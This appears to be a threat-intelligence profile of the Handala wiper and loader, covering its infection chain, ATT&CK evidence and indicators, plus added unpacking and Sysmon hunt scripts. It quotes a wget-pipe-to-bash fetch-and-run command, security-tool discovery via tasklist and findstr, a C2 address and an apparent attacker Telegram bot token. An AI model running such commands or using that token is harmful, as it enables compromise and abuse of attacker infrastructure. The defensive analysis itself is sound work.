Mallory
Malware · Used by 1 actor

Handala

Handala is the name applied both to a destructive wiper malware and to a Delphi-coded second-stage loader (Handala.exe) in the Operation HamsaUpdate intrusion chain. Reporting ties the malware to the Iran-linked Handala group, which claims disruptive and destructive operations carried out with political messaging against Israeli and healthcare-related targets. Reported victimology includes critical infrastructure and organizations broadly, a medical technology organization in 2026, and Stryker, where Handala claimed theft of 50 TB of data and the wiping of more than 200,000 systems, servers, and mobile devices; Stryker confirmed a globally disruptive incident affecting its Microsoft environment.

Capabilities attributed to the malware include irreversible wiping of data, rendering infected systems inoperable, rapid spread across networks, and evasion techniques. Splunk detection guidance lists suspicious regasm processes, unauthorized AutoIt script execution, malicious driver drops, abrupt system slowdowns, and the creation of unknown files or processes as indicators of Handala activity.

In Operation HamsaUpdate, Handala.exe is a Delphi second-stage loader delivered by a Windows .NET loader disguised as F5UPDATER.EXE in a phishing campaign that targeted Israeli customers with F5 BIG-IP vulnerability lures. In that chain, one ZIP variant drops Handala.exe from embedded resources into System32 and executes it. The Handala loader then launches an AutoIt-based injector chain: a renamed AutoIt interpreter (Naples.pif) runs an obfuscated script (k), which injects shellcode that RC4-decrypts the next stage, decompresses payloads with LZNT1, and communicates over HTTPS with 31.192.237[.]207:2515. The broader campaign also deployed Windows and Linux wipers, but those carry separate names: Hatef for the Windows wiper and Hamsa for the Linux wiper. Only the loader is called Handala.exe, so a hash or name match on it does not by itself mean the wiper stage was reached.
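A static re-implementation of the two transforms the injector applies to its next stage, RC4 decryption followed by LZNT1 decompression, added here as an example; it is not code from the Intezer reporting, from Mallory, or from the malware itself. The key and the sample blob are constructed for the demo, the chunk layout follows the MS-XCA description of LZNT1, and the sample deliberately includes a back-reference that overlaps its own output, which is the case naive decompressors get wrong.

```python
"""Static unpacker for the HamsaUpdate-style second stage: RC4 decrypt a
carved blob, then LZNT1 inflate the result. Added example; the key and blob
below are constructed, not taken from any sample."""
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR. Symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _lznt1_chunk(chunk: bytes) -> bytes:
    """Inflate one compressed LZNT1 chunk body: a flag byte, then up to eight
    tokens, each either a literal byte (flag bit clear) or a 16-bit
    length/displacement back-reference (flag bit set)."""
    out = bytearray()
    pos = 0
    while pos < len(chunk):
        flags = chunk[pos]
        pos += 1
        for bit in range(8):
            if pos >= len(chunk):
                break
            if not (flags >> bit) & 1:
                out.append(chunk[pos])        # literal byte
                pos += 1
                continue
            # The split between length and displacement bits shrinks as more
            # of the chunk has been produced (MS-XCA 2.3): start at 12 length
            # bits and give one to the displacement per doubling of position.
            split = 12
            tmp = len(out) - 1
            while tmp >= 0x10:
                tmp >>= 1
                split -= 1
            token = struct.unpack_from("<H", chunk, pos)[0]
            pos += 2
            length = (token & ((1 << split) - 1)) + 3
            disp = (token >> split) + 1
            if disp > len(out):
                raise ValueError("LZNT1 back-reference points before chunk start")
            # Copy byte by byte: length may exceed disp (overlapping, RLE-style).
            for _ in range(length):
                out.append(out[-disp])
    return bytes(out)


def lznt1_decompress(data: bytes) -> bytes:
    """Walk chunk headers: bit 15 = compressed, bits 12-14 = signature 3,
    bits 0-11 = body length minus one; a zero header ends the stream."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if header == 0:
            break
        size = (header & 0xFFF) + 1
        body = data[pos:pos + size]
        pos += size
        out += _lznt1_chunk(body) if header & 0x8000 else body
    return bytes(out)


def unpack_stage(key: bytes, blob: bytes) -> bytes:
    """What the injector does in memory: RC4 decrypt, then LZNT1 inflate."""
    return lznt1_decompress(rc4(key, blob))


# Constructed sample: one compressed chunk (literals "ABC", then a 6-byte
# back-reference at distance 3 that overlaps its own output; header 0xB005 =
# compressed, signature 3, body size 6) followed by one stored chunk "DEFG".
SAMPLE_PLAINTEXT = b"ABCABCABCDEFG"
SAMPLE_COMPRESSED = b"\x05\xb0\x08ABC\x03\x20" + b"\x03\x30DEFG"
SAMPLE_KEY = b"constructed-key"                    # hypothetical, not from a sample
SAMPLE_BLOB = rc4(SAMPLE_KEY, SAMPLE_COMPRESSED)   # stands in for a carved blob

if __name__ == "__main__":
    print(unpack_stage(SAMPLE_KEY, SAMPLE_BLOB))
```

Recovering the real key still means lifting it out of the obfuscated AutoIt script (the page notes its strings are ADD/SUB-masked); this example only covers the transforms that follow.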

High-confidence infrastructure and behavioral details include C2 communications to 31.192.237[.]207:2515, use of AutoIt execution, and, in related campaign reporting, Telegram-based status reporting via Bot ID 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA and Chat ID 6932028002. Overall, Handala is characterized as a severe destructive threat capable of causing major disruption, downtime, financial loss, data loss, and potential exposure of sensitive information.


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.

Handala

Stryker has suffered a major cyberattack involving wiper malware claimed by Handala, a pro-Palestinian hacktivist group linked to Iran.

Source: SentinelOne blog (sentinelone.com)
MITRE ATT&CK

Techniques & procedures

8 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

2 techniques

T1059.003 Windows Command Shell (1 evidence item)

“cmd /c mkdir… copy /b … Naples.pif … cmd.exe …”

T1204 User Execution (1 evidence item)

“the victim is instructed to run a specific file across all their Linux and Windows servers… utilize root privileges to execute a wget command… Windows server administrators are instructed to open and execute an attached archive ZIP file.”

Privilege Escalation

1 technique

T1055 Process Injection (1 evidence item)

“AutoIt… inject a piece of shellcode… unpack and execute more shellcode into dialer.exe and dllhost.exe… injected into a Windows Media Player Process…”

Defense Evasion

3 techniques

T1027 Obfuscated Files or Information (1 evidence item)

“obfuscated payload… concealed within… five Base64 encoding steps… executed using the ‘eval’ command.” / “loader conceals its strings with… ADD… AutoIt script… strings… SUB… shellcode… implements the RC4 stream cipher… decrypt another payload… decompressed… LZNT1.”

T1036 Masquerading (1 evidence item)

“F5UPDATER.EXE… disguised as a system update tool of F5.” / “After masquerading as a routine update… ‘The system has been updated successfully!’” / “Naples.pif… renamed AutoIt interpreter… .pif… camouflage…”

T1055 Process Injection (also mapped under Privilege Escalation; same evidence item)

“AutoIt… inject a piece of shellcode… unpack and execute more shellcode into dialer.exe and dllhost.exe… injected into a Windows Media Player Process…”

Discovery

1 technique

T1057 Process Discovery (1 evidence item)

“Handala… detect any active security software… listing all active tasks… tasklist … filtering… using findstr…”

Command and Control

1 technique

T1105 Ingress Tool Transfer (1 evidence item)

“wget -O - https://…/update.sh | bash” / “Both ZIP files contain… F5UPDATER.EXE… extracts assembly from the resource section. The payload is written to System32 and executed.”

Other

1 technique

T1562.001 Disable or Modify Tools (1 evidence item; ATT&CK places this sub-technique under Defense Evasion)

“Its goal is to detect any active security software… and disable it.”
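Hunt logic for the process behaviours quoted in the technique evidence above (the cmd /c copy /b assembly of Naples.pif, the renamed AutoIt interpreter, tasklist piped to findstr) together with two of the Splunk indicators from the summary (unauthorized AutoIt execution, suspicious regasm processes), run over constructed process-creation events. This is an added example, not a Mallory, Splunk or vendor rule. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, OriginalFileName); the regasm heuristic (assembly loaded from a user-writable path) is my assumption rather than Splunk's published logic, and every path and event below is made up for the demo. File-write indicators such as driver drops are out of scope here because they live in a different event type.

```python
"""Hunt for HamsaUpdate/Handala process behaviours over Sysmon-style
process-creation events. Added example, not a Mallory or Splunk rule; the
events, paths and the regasm heuristic are constructed/assumed for the demo."""
import re

# Sysmon's OriginalFileName comes from the PE version resource, so it still
# reads AutoIt3.exe after the interpreter is renamed to Naples.pif.
AUTOIT_ORIGINAL_NAME = "autoit3.exe"
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = re.compile(r"\\users\\|\\temp\\|\\appdata\\|\\programdata\\")


def _field(ev: dict, key: str) -> str:
    return str(ev.get(key, "")).lower()


def check_event(ev: dict) -> list:
    """Return the names of every heuristic the event trips (empty if benign)."""
    image, cmd = _field(ev, "Image"), _field(ev, "CommandLine")
    original = _field(ev, "OriginalFileName")
    hits = []
    # T1059.003 + T1036: cmd.exe stitching a .pif together with copy /b
    if image.endswith("\\cmd.exe") and "copy /b" in cmd and ".pif" in cmd:
        hits.append("cmd_copy_b_pif_assembly")
    # T1036: a .pif whose version resource identifies it as the AutoIt interpreter
    if image.endswith(".pif") and original == AUTOIT_ORIGINAL_NAME:
        hits.append("renamed_autoit_interpreter")
    # Splunk guidance ("unauthorized AutoIt script execution"): AutoIt running
    # from outside the usual install locations, whatever it is called on disk
    if original == AUTOIT_ORIGINAL_NAME and not image.startswith(SYSTEM_DIRS):
        hits.append("autoit_outside_install_dirs")
    # T1057: tasklist piped into findstr to look for security products
    if image.endswith("\\cmd.exe") and "tasklist" in cmd and "findstr" in cmd:
        hits.append("tasklist_findstr_process_discovery")
    # Splunk guidance ("suspicious regasm processes"); the heuristic assumed
    # here is regasm.exe registering an assembly from a user-writable path
    if image.endswith("\\regasm.exe") and USER_WRITABLE.search(cmd):
        hits.append("regasm_user_writable_assembly")
    return hits


def hunt(events: list) -> list:
    """(EventId, hits) for every event that trips at least one heuristic."""
    results = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            results.append((ev["EventId"], hits))
    return results


# Constructed events: 1-4 mimic the chain, 5-6 are benign look-alikes.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\Handala.exe",
     "CommandLine": "cmd /c mkdir C:\\Users\\Public\\n & copy /b a + b C:\\Users\\Public\\n\\Naples.pif"},
    {"EventId": 2, "Image": "C:\\Users\\Public\\n\\Naples.pif",
     "OriginalFileName": "AutoIt3.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "C:\\Users\\Public\\n\\Naples.pif k"},
    {"EventId": 3, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Users\\Public\\n\\Naples.pif",
     "CommandLine": 'cmd /c tasklist | findstr /i "MsMpEng"'},
    {"EventId": 4, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegAsm.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "RegAsm.exe C:\\Users\\bob\\AppData\\Local\\Temp\\stage.dll"},
    {"EventId": 5, "Image": "C:\\Program Files\\AutoIt3\\AutoIt3.exe",
     "OriginalFileName": "AutoIt3.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "AutoIt3.exe build.au3"},
    {"EventId": 6, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for event_id, hits in hunt(SAMPLE_EVENTS):
        print(event_id, hits)
```

The OriginalFileName check is the durable part: renaming AutoIt3.exe to Naples.pif changes the image name but not the version resource, so a rule keyed on the on-disk name alone misses the very masquerade the evidence describes. The tasklist/findstr and regasm checks will need tuning against your own admin-tooling baseline before they are paged on.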

INDICATORS OF COMPROMISE

IOCs tracked for this family

9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups: 1 network indicator (IPs, domains, and DNS infrastructure linked to this family) and 8 file hashes (MD5, SHA-1, SHA-256) from samples and reports. Full hash values are withheld on the public page; of the six SHA-256 entries listed, the latest sightings (relative to the page's capture date) are 2 months ago for four, 3 months ago for one, and 3 years ago for one.
ACTIVITY FEED

Recent activity: 4 sources tracked across advisories, community write-ups, and news.
